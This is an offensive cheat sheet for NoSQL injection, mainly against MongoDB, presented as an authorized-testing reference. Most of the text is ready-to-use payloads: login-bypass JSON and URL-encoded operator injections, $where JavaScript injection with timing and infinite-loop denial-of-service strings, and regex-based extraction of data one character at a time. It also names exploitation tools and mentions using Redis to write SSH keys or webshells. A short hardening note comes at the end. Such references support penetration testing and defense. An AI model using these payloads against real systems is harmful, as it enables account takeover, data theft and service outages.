NOSQL-INJECTION
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Injection against NoSQL stores (MongoDB most common). Instead of SQL syntax you abuse query operators and type juggling. Authorized testing only.
AUTH BYPASS (MONGODB)#
JSON body (login):
{"user":"admin","pass":{"$ne":null}}
{"user":"admin","pass":{"$ne":"x"}}
{"user":{"$gt":""},"pass":{"$gt":""}}
{"user":"admin","pass":{"$regex":"^a"}} # confirm charset -> extract
URL-encoded form (operator in the key):
user=admin&pass[$ne]=x
user[$ne]=&pass[$ne]=
Known operators: $ne $gt $gte $lt $lte $in $nin $regex $exists $where $or $and
OPERATOR / SYNTAX INJECTION#
If input is placed in the query object, inject operators to change logic.
{"age":{"$gt":0}} # always true
{"$where":"this.pass.length > 0"} # JS evaluated server-side
{"$where":"sleep(5000)"} # time-based oracle
JAVASCRIPT INJECTION ($where / mapReduce)#
Blind boolean/time via server-side JS:
';return true;var x='
';return (this.password[0]=='a');var x='
';while(true){};var x=' # DoS / timing
Modern drivers often disable $where; test anyway.
BLIND DATA EXFIL (REGEX ORACLE)#
Extract a field char-by-char using $regex true/false responses: pass[$regex]=^a pass[$regex]=^b ... # first char pass[$regex]=^admin1 ... # extend prefix Automate with Burp Intruder or a script walking the charset.
TOOLING#
NoSQLMap # automated detection/exploitation (Mongo, Couch) nosqli (Go) # nosqli scan -t http://host/login -u user -p pass Burp + manual operator payload lists (seclists NoSQL) mongo shell / Compass to confirm impact on an authorized test DB
OTHER STORES#
CouchDB: _all_docs, _users abuse, Erlang/HTTP API auth gaps. Redis: unauth access -> CONFIG SET to write SSH keys/webshell, module load. GraphQL over Mongo: inject operators inside variables.
HARDENING (blue-team note)#
Cast/validate types (reject objects where strings expected), use parameterized driver queries, disable server-side JS ($where, mapReduce), least-privilege DB users, and schema validation.